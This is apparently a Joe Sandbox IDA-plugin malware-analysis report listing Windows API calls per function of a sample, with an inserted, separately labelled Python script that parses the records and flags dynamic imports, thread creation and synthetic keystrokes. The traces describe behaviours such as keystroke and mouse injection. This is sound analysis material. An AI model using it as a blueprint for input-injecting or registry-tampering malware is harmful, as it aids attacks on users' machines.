                                                                                          • GetCurrentProcess.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00439123
                                                                                          • DuplicateHandle.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0043912C
                                                                                          • GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00439138
                                                                                          • GetCurrentProcess.KERNEL32(?,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00439142
                                                                                          • DuplicateHandle.KERNEL32(00000000,?,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 00439145
                                                                                          • CreateThread.KERNEL32(00000000,00000000,004390C2,00000000,00000000,00000000), ref: 0043915E
                                                                                          Similarity
                                                                                          • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                                                                          • String ID:
                                                                                          • API String ID: 1957940570-0
                                                                                          • Opcode ID: ae016cd78919e3da0d3d218cc031d8d4f693afb8d34ff927aa47fd3b6f506194
                                                                                          • Instruction ID: b388a4287fabc35bf2088fa38ebc9459a42e34e8a642192e1b63b89709cb9be3
                                                                                          • Opcode Fuzzy Hash: ae016cd78919e3da0d3d218cc031d8d4f693afb8d34ff927aa47fd3b6f506194
                                                                                          • Instruction Fuzzy Hash: 3BF0CD753413007BD220EB65DC86F5BB7A8EBC9B10F118919F6049B1D1C6B4A800CB65
                                                                                          APIs
                                                                                          • ___set_flsgetvalue.LIBCMT ref: 00415690
                                                                                            • Part of subcall function 00416A84: TlsGetValue.KERNEL32(00411739,00416C10,?,00411739,00417F28,00413979,?,?,00411739,?,00401C0B), ref: 00416A8D
                                                                                            • Part of subcall function 00416A84: __decode_pointer.LIBCMT ref: 00416A9F
                                                                                            • Part of subcall function 00416A84: TlsSetValue.KERNEL32(00000000,00411739,00417F28,00413979,?,?,00411739,?,00401C0B), ref: 00416AAE
                                                                                          • ___fls_getvalue@4.LIBCMT ref: 0041569B
                                                                                            • Part of subcall function 00416A64: TlsGetValue.KERNEL32(?,?,004140F1,00000000), ref: 00416A72
                                                                                          • ___fls_setvalue@8.LIBCMT ref: 004156AD
                                                                                            • Part of subcall function 00416AB8: __decode_pointer.LIBCMT ref: 00416AC9
                                                                                          • GetLastError.KERNEL32(00000000,?,00000000), ref: 004156B6
                                                                                          • ExitThread.KERNEL32 ref: 004156BD
                                                                                          • __freefls@4.LIBCMT ref: 004156D9
                                                                                          • __IsNonwritableInCurrentImage.LIBCMT ref: 004156EC
                                                                                          Similarity
                                                                                          • API ID: Value$__decode_pointer$CurrentErrorExitImageLastNonwritableThread___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4
                                                                                          • String ID:
                                                                                          • API String ID: 4166825349-0
                                                                                          • Opcode ID: 185d0aae8fe32bab84a079219336c355dd614541d1aff55515eff8c05f91681e
                                                                                          • Instruction ID: 1015f584654e325efa3cacb901eba7c9ae2b5aefa54885f90b4e6d99173acdac
                                                                                          • Opcode Fuzzy Hash: 185d0aae8fe32bab84a079219336c355dd614541d1aff55515eff8c05f91681e
                                                                                          • Instruction Fuzzy Hash: 14F049745007009BD704BF72DD159DE7B69AF85345761C85FB80897222DA3DC9C1CB9C
                                                                                          APIs
                                                                                          • LoadLibraryA.KERNEL32(advapi32.dll,p#D,0043415E,p#D,?,00442370,?), ref: 00434134
                                                                                          • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00434146
                                                                                          Similarity
                                                                                          • API ID: AddressLibraryLoadProc
                                                                                          • String ID: RegDeleteKeyExW$advapi32.dll$p#D$p#D
                                                                                          • API String ID: 2574300362-3261711971
                                                                                          • Opcode ID: 3da92f374f37a9fa7395fa6ef73d3af1d379715eec5b41da1672ebd70bf57acc
                                                                                          • Instruction ID: cb82693085896f9455b4638215a98dd7e3cb824177552166877179ce6000b7c2
                                                                                          • Opcode Fuzzy Hash: 3da92f374f37a9fa7395fa6ef73d3af1d379715eec5b41da1672ebd70bf57acc
                                                                                          • Instruction Fuzzy Hash: D8D05EB0400B039FCB105F24D8086AB76F4EB68700F208C2EF989A3750C7B8E8C0CB68
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: c82efa3070467c2623ec738b5b2be2cd760763614a3dd1863134219050ad48d5
                                                                                          • Instruction ID: be39947db1ffbcb7075193c31d102fc15fe4f6af8d23ce90efbce3d2b6a77a88
                                                                                          • Opcode Fuzzy Hash: c82efa3070467c2623ec738b5b2be2cd760763614a3dd1863134219050ad48d5
                                                                                          • Instruction Fuzzy Hash: 4BF16D71108740AFD210DB59C880EABB7F9EFCA744F10891EF69983261D735AC45CBAA
                                                                                          APIs
                                                                                          • GetClientRect.USER32(?,?), ref: 00433724
                                                                                          • GetWindowRect.USER32(00000000,?), ref: 00433757
                                                                                          • GetClientRect.USER32(0000001D,?), ref: 004337AC
                                                                                          • GetSystemMetrics.USER32(0000000F), ref: 00433800
                                                                                          • GetWindowRect.USER32(?,?), ref: 00433814
                                                                                          • ScreenToClient.USER32(?,?), ref: 00433842
                                                                                          Similarity
                                                                                          • API ID: Rect$Client$Window$MetricsScreenSystem
                                                                                          • String ID:
                                                                                          • API String ID: 3220332590-0
                                                                                          • Opcode ID: 3d0204db3781b081fd3de6a8efec2d06c6e501bf89adf1cf9fb69463b8de8f3e
                                                                                          • Instruction ID: 40e56d112be44df416332e5c874318f33691c6b0c201ea6c9f9086adb5117cf0
                                                                                          • Opcode Fuzzy Hash: 3d0204db3781b081fd3de6a8efec2d06c6e501bf89adf1cf9fb69463b8de8f3e
                                                                                          • Instruction Fuzzy Hash: E9A126B42147028AC324CF68C5847ABBBF1FF98715F04991EE9D983360E775E908CB5A
                                                                                          Similarity
                                                                                          • API ID: _malloc_wcslen$_strcat_wcscpy
                                                                                          • String ID:
                                                                                          • API String ID: 1612042205-0
                                                                                          • Opcode ID: de2929fcda50375e6e5cb9f1075b8832783a078aa1feca3c1cc6154b42d84a61
                                                                                          • Instruction ID: 39b6431fb86a1cae222df6ecce28f21653e085caad8de22f1e35678e4483a9b6
                                                                                          • Opcode Fuzzy Hash: de2929fcda50375e6e5cb9f1075b8832783a078aa1feca3c1cc6154b42d84a61
                                                                                          • Instruction Fuzzy Hash: CD613B70504202EFCB10EF29D58096AB3E5FF48305B50496EF8859B306D738EE59DB9A
                                                                                          APIs
                                                                                          • GetKeyboardState.USER32(?,?,00000001,00000001,?,00000000), ref: 0044C588
                                                                                          • SetKeyboardState.USER32(00000080), ref: 0044C59B
                                                                                          • PostMessageW.USER32(?,00000104,?,?), ref: 0044C5EC
                                                                                          • PostMessageW.USER32(?,00000100,?,?), ref: 0044C610
                                                                                          • PostMessageW.USER32(?,00000102,?,00000001), ref: 0044C637
                                                                                          • SendInput.USER32 ref: 0044C6E2
                                                                                          Similarity
                                                                                          • API ID: MessagePost$KeyboardState$InputSend
                                                                                          • String ID:
                                                                                          • API String ID: 2221674350-0
                                                                                          • Opcode ID: 061e63fcf1402e721e52ee56d2f22f81c2cbe03cfd8f861d8ff00d299370d474
                                                                                          • Instruction ID: 3a634557d1668dba9f4fbb3ffee1259adddcddb7f3fce46f2ce6721246940f3b
                                                                                          • Opcode Fuzzy Hash: 061e63fcf1402e721e52ee56d2f22f81c2cbe03cfd8f861d8ff00d299370d474
                                                                                          • Instruction Fuzzy Hash: A24148725053486AF760EF209C80BFFBB98EF95324F04151FFDC412281D66E984987BA
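The records above are the Joe Sandbox IDA plugin's per-function API listing, and three of them show behaviour an analyst would pull out by hand: LoadLibraryA/GetProcAddress resolving advapi32.dll!RegDeleteKeyExW at run time, GetCurrentProcess/DuplicateHandle followed by CreateThread with start routine 004390C2, and keystroke synthesis where PostMessageW is handed the message numbers 0x104, 0x100 and 0x102 (WM_SYSKEYDOWN, WM_KEYDOWN, WM_CHAR) alongside SetKeyboardState and SendInput. The following script is an added example, not part of this report and not Joe Sandbox tooling: it parses that listing format (the "• Name.MODULE(args), ref: ADDR" lines, the "Part of subcall function" prefix, and the "• Key: value" fields) into one record per function and raises those three flags. The sample input is constructed from the records on this page, with long argument lists and the Memory Dump Source block shortened; the flag wording and the choice of which API combinations to flag are this example's own.

```python
"""Parse Joe Sandbox IDA-plugin function records and flag behaviours worth a second look."""
import re
from dataclasses import dataclass, field
from typing import Dict, List, Optional

# "• Name.MODULE(args), ref: ADDR"; the "(args)" list and the "Part of subcall function X:"
# prefix are both optional in the report (compare "SendInput.USER32 ref: 0044C6E2").
CALL_RE = re.compile(
    r"^•\s+(?:Part of subcall function (?P<callee>[0-9A-F]{8}):\s+)?"
    r"(?P<name>[A-Za-z_@][A-Za-z0-9_@]*)\.(?P<module>[A-Z0-9]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s+ref:\s+(?P<ref>[0-9A-F]{8})$")
FIELD_RE = re.compile(r"^•\s+(?P<key>[A-Za-z ]+?):\s*(?P<val>.*)$")  # "• Key: value" lines
# Window messages seen as PostMessageW's second argument in the keystroke-injection record.
WM_NAMES = {0x100: "WM_KEYDOWN", 0x101: "WM_KEYUP", 0x102: "WM_CHAR", 0x104: "WM_SYSKEYDOWN"}

@dataclass
class Call:
    name: str
    module: str
    args: List[str]
    ref: str
    callee: Optional[str]  # subcall address when the API is reached indirectly

@dataclass
class FunctionRecord:
    calls: List[Call] = field(default_factory=list)
    fields: Dict[str, str] = field(default_factory=dict)  # Memory Dump Source + Similarity

def parse_records(text: str) -> List[FunctionRecord]:
    """One FunctionRecord per analysed function, in report order."""
    records, cur = [], FunctionRecord()
    for raw in text.splitlines():
        line = raw.strip()  # the HTML export indents every line heavily
        # A record with API calls opens at "APIs"; one without opens at "Memory Dump Source"
        # (recognisable because the previous record's Similarity fields are already filled).
        if line == "APIs" or (line == "Memory Dump Source" and cur.fields):
            if cur.calls or cur.fields:
                records.append(cur)
            cur = FunctionRecord()
        elif m := CALL_RE.match(line):
            args = [a for a in (m.group("args") or "").split(",") if a]
            cur.calls.append(Call(m.group("name"), m.group("module"), args,
                                  m.group("ref"), m.group("callee")))
        elif m := FIELD_RE.match(line):  # drop the "Download File" link text the export leaves
            key, val = m.group("key"), m.group("val").replace("Download File", "").strip()
            cur.fields[key] = f"{cur.fields[key]}; {val}" if key in cur.fields else val
    if cur.calls or cur.fields:
        records.append(cur)
    return records

def triage(rec: FunctionRecord) -> List[str]:
    """Behaviour flags for one record, derived only from its listed API calls."""
    names, flags = {c.name for c in rec.calls}, []
    # Dynamic import: pair each GetProcAddress export with the last LoadLibrary* module.
    if "GetProcAddress" in names:
        libs = [c.args[0] for c in rec.calls if c.name.startswith("LoadLibrary") and c.args]
        lib = libs[-1] if libs else "<module unknown>"
        flags += [f"dynamic import {lib}!{c.args[1]}" for c in rec.calls
                  if c.name == "GetProcAddress" and len(c.args) > 1]
    # Handle duplication followed by a thread start (the start routine is the 3rd argument).
    if {"DuplicateHandle", "CreateThread"} <= names:
        flags += [f"DuplicateHandle + CreateThread, start routine {c.args[2]}"
                  for c in rec.calls if c.name == "CreateThread" and len(c.args) > 2]
    # Synthetic keystrokes: decode the WM_* numbers posted, backed by an input-state API.
    msgs = []
    for c in rec.calls:
        if c.name in ("PostMessageW", "PostMessageA") and len(c.args) > 1:
            # "?" marks an argument the plugin could not resolve, so only parse clean hex
            msg = int(c.args[1], 16) if re.fullmatch(r"[0-9A-F]+", c.args[1]) else None
            if msg in WM_NAMES:
                msgs.append(WM_NAMES[msg])
    if msgs and names & {"SendInput", "SetKeyboardState", "keybd_event"}:
        flags.append("synthetic keyboard input: " + ", ".join(msgs))
    return flags

def summarise(text: str) -> List[tuple]:
    """(API ID, flags) for every record that raises at least one flag."""
    return [(r.fields.get("API ID", ""), f) for r in parse_records(text) if (f := triage(r))]

# Constructed input: three records copied from the report above, with the long argument
# lists, the Similarity heading and the per-record Memory Dump Source block shortened.
SAMPLE = """\
APIs
• Part of subcall function 00438FE4: HeapAlloc.KERNEL32(00000000,?,?), ref: 00438FEF
• DuplicateHandle.KERNEL32(00000000,?,00000000,?,?,?,?), ref: 0043912C
• CreateThread.KERNEL32(00000000,00000000,004390C2,00000000,00000000,00000000), ref: 0043915E
• API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
APIs
• LoadLibraryA.KERNEL32(advapi32.dll,p#D,0043415E,p#D,?,00442370,?), ref: 00434134
• GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00434146
• API ID: AddressLibraryLoadProc
APIs
• SetKeyboardState.USER32(00000080), ref: 0044C59B
• PostMessageW.USER32(?,00000104,?,?), ref: 0044C5EC
• PostMessageW.USER32(?,00000100,?,?), ref: 0044C610
• PostMessageW.USER32(?,00000102,?,00000001), ref: 0044C637
• SendInput.USER32 ref: 0044C6E2
• API ID: MessagePost$KeyboardState$InputSend
"""
```

Run it against the text of a full report rather than SAMPLE to get one line per flagged function; the "API ID" field that Joe Sandbox attaches to each record is kept as the label because it survives even when the record has no resolved API call lines. The "Part of subcall function" prefix is preserved in Call.callee so that a flag raised through a helper (for instance the HeapAlloc reached via 00438FE4) can be traced back to the routine that actually makes the call.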
                                                                                          Similarity
                                                                                          • API ID: _wcscpy$_wcscat
                                                                                          • String ID:
                                                                                          • API String ID: 2037614760-0
                                                                                          • Opcode ID: f99e136c889cacb8689bc9f00eee4ad51686cf745bff212a4790763dd87d00cb
                                                                                          • Instruction ID: 871aa96d6b0d5f43eceffdadd72b032f7becd6ba50fbda5e2bca5dd503650597
                                                                                          • Opcode Fuzzy Hash: f99e136c889cacb8689bc9f00eee4ad51686cf745bff212a4790763dd87d00cb
                                                                                          • Instruction Fuzzy Hash: 7D41BD31901A256BDE317F55D880BBB7358DFA1314F84006FF98247313EA6E5892C6BE
                                                                                          APIs
                                                                                          • BeginPaint.USER32(00000000,?,004A83D8,?), ref: 00447B9D
                                                                                          • GetWindowRect.USER32(?,?), ref: 00447C1B
                                                                                          • ScreenToClient.USER32(?,?), ref: 00447C39
                                                                                          • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00447C4C
                                                                                          • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 00447C93
                                                                                          • EndPaint.USER32(?,?), ref: 00447CD1
                                                                                          Similarity
                                                                                          • API ID: Paint$BeginClientRectRectangleScreenViewportWindow
                                                                                          • String ID:
                                                                                          • API String ID: 4189319755-0
                                                                                          • Opcode ID: 37bca05dc5f282a43c1c57c3b808f61ec058395b4d713bcb6da44fc2610780a1
                                                                                          • Instruction ID: de699fe3e67e71f806f86ee7feca1bcffcb0489daa19151882f3061068cc4b26
                                                                                          • Opcode Fuzzy Hash: 37bca05dc5f282a43c1c57c3b808f61ec058395b4d713bcb6da44fc2610780a1
                                                                                          • Instruction Fuzzy Hash: D14182705043019FE320DF15C8C8F7B7BA8EB89724F04466EF9548B391DB74A846CB69
                                                                                          APIs
                                                                                          • InterlockedExchange.KERNEL32(?,000001F5), ref: 0044B490
                                                                                            • Part of subcall function 0041171A: _malloc.LIBCMT ref: 00411734
                                                                                          • ReadFile.KERNEL32(?,?,0000FFFF,?,00000000), ref: 0044B4C2
                                                                                          • EnterCriticalSection.KERNEL32(00000000), ref: 0044B4E3
                                                                                          • LeaveCriticalSection.KERNEL32(00000000), ref: 0044B5A0
                                                                                          • ReadFile.KERNEL32(?,?,0000FFFF,?,00000000), ref: 0044B5BB
                                                                                            • Part of subcall function 0041171A: std::bad_alloc::bad_alloc.LIBCMT ref: 00411757
                                                                                            • Part of subcall function 0041171A: std::bad_exception::bad_exception.LIBCMT ref: 0041176B
                                                                                            • Part of subcall function 0041171A: __CxxThrowException@8.LIBCMT ref: 00411779
                                                                                          • InterlockedExchange.KERNEL32(?,000001F6), ref: 0044B5D1
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: CriticalExchangeFileInterlockedReadSection$EnterException@8LeaveThrow_mallocstd::bad_alloc::bad_allocstd::bad_exception::bad_exception
                                                                                          • String ID:
                                                                                          • API String ID: 1726766782-0
                                                                                          • Opcode ID: 3a1f833abb26ce593740c71d471a220e6d34013d7717cf1b73c6152b0bb325a5
                                                                                          • Instruction ID: bf52b5dc2e344941501510e432fc863898df75637e45487ca8cd05157db66b41
                                                                                          • Opcode Fuzzy Hash: 3a1f833abb26ce593740c71d471a220e6d34013d7717cf1b73c6152b0bb325a5
                                                                                          • Instruction Fuzzy Hash: 09415C75104701AFD320EF26D845EABB3F8EF88708F008E2DF59A92650D774E945CB6A
                                                                                          APIs
                                                                                          • ShowWindow.USER32(?,00000000,?,?,?,?,00448962,004A83D8,?,?), ref: 004410F9
                                                                                          • EnableWindow.USER32(?,00000000), ref: 0044111A
                                                                                          • ShowWindow.USER32(?,00000000,?,?,?,?,00448962,004A83D8,?,?), ref: 00441183
                                                                                          • ShowWindow.USER32(?,00000004,?,?,?,00448962,004A83D8,?,?), ref: 00441192
                                                                                          • EnableWindow.USER32(?,00000001), ref: 004411B3
                                                                                          • SendMessageW.USER32(?,0000130C,?,00000000), ref: 004411D5
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: Window$Show$Enable$MessageSend
                                                                                          • String ID:
                                                                                          • API String ID: 642888154-0
                                                                                          • Opcode ID: c853c7407bbaf9010c68549c691492fdcd401e5b0cb22aeb5446aebbed6f20c9
                                                                                          • Instruction ID: 824eeaafe1f931a994963cd163acc5b0ce47b26168a6fd4ee38d593e4569daee
                                                                                          • Opcode Fuzzy Hash: c853c7407bbaf9010c68549c691492fdcd401e5b0cb22aeb5446aebbed6f20c9
                                                                                          • Instruction Fuzzy Hash: 14417770604245DFE725CF14C984FA6B7E5BF89300F1886AEE6859B3B2CB74A881CB55
                                                                                          APIs
                                                                                          • SendMessageW.USER32(00000000,00001024,00000000,?), ref: 004490E3
                                                                                          • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 004490F8
                                                                                          • SendMessageW.USER32(00000000,0000111E,00000000,?), ref: 0044910D
                                                                                          • InvalidateRect.USER32(?,00000000,00000001), ref: 00449124
                                                                                          • GetWindowLongW.USER32(00000000,000000F0), ref: 0044912F
                                                                                          • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 0044913C
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: MessageSend$LongWindow$InvalidateRect
                                                                                          • String ID:
                                                                                          • API String ID: 1976402638-0
                                                                                          • Opcode ID: 2b574cf222373ea94a5f8b1e2da5d15417ee742d7ff148607d59a4e94613559a
                                                                                          • Instruction ID: 8b80d2acd15126bdfc8b54909556444574c0e56a9806921f1e0b477f33817628
                                                                                          • Opcode Fuzzy Hash: 2b574cf222373ea94a5f8b1e2da5d15417ee742d7ff148607d59a4e94613559a
                                                                                          • Instruction Fuzzy Hash: F231B476244202AFF224DF04DC89FBBB7A9F785321F14492EF291973D0CA75AC469729
                                                                                          APIs
                                                                                          • GetForegroundWindow.USER32 ref: 00442597
                                                                                            • Part of subcall function 004344B7: GetWindowRect.USER32(?,?), ref: 004344D3
                                                                                          • GetDesktopWindow.USER32 ref: 004425BF
                                                                                          • GetWindowRect.USER32(00000000), ref: 004425C6
                                                                                          • mouse_event.USER32(00008001,?,?,?,?), ref: 004425F5
                                                                                            • Part of subcall function 00436272: Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,0044269D,0000000A), ref: 00436287
                                                                                          • GetCursorPos.USER32(?), ref: 00442624
                                                                                          • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 00442690
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: Window$Rectmouse_event$CursorDesktopForegroundSleep
                                                                                          • String ID:
                                                                                          • API String ID: 4137160315-0
                                                                                          • Opcode ID: 9bf1d5af4d3523281d87c855d40d0150606dc562a9e0308dc2a2f88b36285eae
                                                                                          • Instruction ID: 1581b522c3ee05a339ffa1fd07f9e8cd23967deed6539873686ea33d82c69dd2
                                                                                          • Opcode Fuzzy Hash: 9bf1d5af4d3523281d87c855d40d0150606dc562a9e0308dc2a2f88b36285eae
                                                                                          • Instruction Fuzzy Hash: 7C31C1B2104306ABD310DF54CD85E6BB7E9FB98304F004A2EF94597281E675E9058BA6
                                                                                          APIs
                                                                                          • SendMessageW.USER32(?,000000F1,?,00000000), ref: 0044886C
                                                                                          • EnableWindow.USER32(004A83D8,00000000), ref: 00448BAB
                                                                                          • EnableWindow.USER32(004A83D8,00000001), ref: 00448BC1
                                                                                          • ShowWindow.USER32(004A83D8,00000000,004A83D8,?,?), ref: 00448C37
                                                                                          • ShowWindow.USER32(004A83D8,00000004,004A83D8), ref: 00448C43
                                                                                          • EnableWindow.USER32(004A83D8,00000001), ref: 00448C58
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: Window$Enable$Show$MessageSend
                                                                                          • String ID:
                                                                                          • API String ID: 1871949834-0
                                                                                          • Opcode ID: 703f0702a5e3ae6889c0b2c4cbd553a5347372704319c0c884d711360b5070ea
                                                                                          • Instruction ID: fbfed122d4da650e42f877d7e8bff2bfe9b33138fa51555fe8345b8bcc16d821
                                                                                          • Opcode Fuzzy Hash: 703f0702a5e3ae6889c0b2c4cbd553a5347372704319c0c884d711360b5070ea
                                                                                          • Instruction Fuzzy Hash: A731F3B07443819BF7248E14C8C4BAFB7D0AB95345F08482EF981A63D1DBAC9846872A
                                                                                          APIs
                                                                                          • _memset.LIBCMT ref: 0044961A
                                                                                          • SendMessageW.USER32 ref: 0044964A
                                                                                            • Part of subcall function 00433A98: _wcspbrk.LIBCMT ref: 00433AAC
                                                                                          • SendMessageW.USER32(?,00001074,?,00000001), ref: 004496AC
                                                                                          • _wcslen.LIBCMT ref: 004496BA
                                                                                          • _wcslen.LIBCMT ref: 004496C7
                                                                                          • SendMessageW.USER32(?,00001074,?,?), ref: 004496FD
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: MessageSend$_wcslen$_memset_wcspbrk
                                                                                          • String ID:
                                                                                          • API String ID: 1624073603-0
                                                                                          • Opcode ID: 3158986b153f08837b9b71a8f77f3cc169978b1c24ba43a32ffefb24081b9654
                                                                                          • Instruction ID: 7e49a266cf7116299f7bc8659d1ce07b00adedb8b3f1b428e1954e4b11147a1e
                                                                                          • Opcode Fuzzy Hash: 3158986b153f08837b9b71a8f77f3cc169978b1c24ba43a32ffefb24081b9654
                                                                                          • Instruction Fuzzy Hash: B631CA71508300AAE720DF15DC81BEBB7D4EBD4720F504A1FFA54862D0EBBAD945C7A6
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 8dc28afdcb3e23db499faf1906c1cec9916ddd90de084288035f36419de8ba35
                                                                                          • Instruction ID: 0263b137e1f68684b0dae4bb7f633391a2f723f0f4072b7ce39308acd6c8c458
                                                                                          • Opcode Fuzzy Hash: 8dc28afdcb3e23db499faf1906c1cec9916ddd90de084288035f36419de8ba35
                                                                                          • Instruction Fuzzy Hash: 31219272245110ABE7108B68DCC4B6F7798EB96374F240A3AF512C61E1EA7998C1C769
                                                                                          APIs
                                                                                          • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 004555AD
                                                                                          • DestroyWindow.USER32(?,?,?,?,?), ref: 00455640
                                                                                          • DeleteObject.GDI32(?), ref: 0045564E
                                                                                          • DeleteObject.GDI32(?), ref: 0045565C
                                                                                          • DestroyIcon.USER32(?,?,?,?,?), ref: 0045566A
                                                                                          • DestroyWindow.USER32(?,?,?,?,?), ref: 00455678
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
